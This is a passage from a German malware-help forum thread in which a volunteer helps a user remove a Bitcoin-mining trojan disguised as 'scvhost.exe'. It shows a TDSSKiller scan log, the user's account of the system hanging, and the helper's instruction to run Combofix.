21:11:09.0149 4112 ndsvc ( UnsignedFile.Multi.Generic ) - User select action: Skip
21:11:09.0165 4112 NTIDrvr ( UnsignedFile.Multi.Generic ) - skipped by user
21:11:09.0165 4112 NTIDrvr ( UnsignedFile.Multi.Generic ) - User select action: Skip
21:11:09.0165 4112 VNUSB ( UnsignedFile.Multi.Generic ) - skipped by user
21:11:09.0165 4112 VNUSB ( UnsignedFile.Multi.Generic ) - User select action: Skip
21:11:09.0181 4112 WMIService ( UnsignedFile.Multi.Generic ) - skipped by user
21:11:09.0181 4112 WMIService ( UnsignedFile.Multi.Generic ) - User select action: Skip
21:11:20.0584 3284 Deinitialize success
Übrigens musste ich diesen Post von einem anderen Rechner erstellen, da der betroffene Rechner alle möglichen Programme "hängenbleiben ließ". Hatte zB die Internetverbindung getrennt damit ich den Virenscanner ausschalten kann währenddessen tdskiller läuft und wenn ich das Fenster Netzwerkverbindungen öffnen will, passiert seit ca. 10 Minuten nichts. Gleiches Phänomen bei ein paar anderen Fenstern, aber ich konnte zum Glück die log files (nach 2 Versuchen) auf nen USB Stick kopieren... EDIT: Nach 2 Neustarts scheint Windows wieder normal zu laufen, bis auf diese geblockte autostarts meldung... Geändert von Hagaaar (04.06.2013 um 21:15 Uhr) |
|
05.06.2013, 11:25
| #9 |
| /// Malware-holic | Trojan.Bitminer "C:\Users\***\AppDate\Roaming\pejo\scvhost.exe" Schaun wir mal weiter. Scan mit Combofix
__________________ -Verdächtige mails bitte an uns zur Analyse weiterleiten: markusg.trojaner-board@web.de Weiterleiten Anleitung: http://markusg.trojaner-board.de Mails bitte vorerst nach obiger Anleitung an markusg.trojaner-board@web.de Weiterleiten Wenn Ihr uns unterstützen möchtet |
|
05.06.2013, 15:19
| #10 |
| | Trojan.Bitminer "C:\Users\***\AppDate\Roaming\pejo\scvhost.exe" Danke, dass du dranbleibst! Kann aber leider erst morgen weitermachen, da es sich nicht um meinen Rechner handelt und ich ihn deswegen nicht bei mir habe. Werde die Schritte mit Combofix morgen Abend durchgehen und mich dann wieder melden. |
|
05.06.2013, 17:47
| #11 |
| /// Malware-holic | Trojan.Bitminer "C:\Users\***\AppDate\Roaming\pejo\scvhost.exe" lass bitte solche zwischneposts weg. da neue an diesen angehangen werden, bin warscheinlich ab morgen nicht da, bis sonnabend
__________________ -Verdächtige mails bitte an uns zur Analyse weiterleiten: markusg.trojaner-board@web.de Weiterleiten Anleitung: http://markusg.trojaner-board.de Mails bitte vorerst nach obiger Anleitung an markusg.trojaner-board@web.de Weiterleiten Wenn Ihr uns unterstützen möchtet |
|
| Themen zu Trojan.Bitminer "C:\Users\***\AppDate\Roaming\pejo\scvhost.exe" |
| antivir, avira, bho, bingbar, bitcoin, bonjour, browser, bundes trojaner, converter, dos fenster, error, eset smart security, excel, firefox, flash player, google, helper, home, install.exe, installation, intranet, logfile, microsoft office 2003, mp3, officejet, olympus, origin, pdfforge toolbar, plug-in, realtek, registry, required, software, start von windows, svchost.exe, system, trojaner, virus, vista, windows |
Textbox. 
WARNUNG an die MITLESER: 
Linear-Darstellung
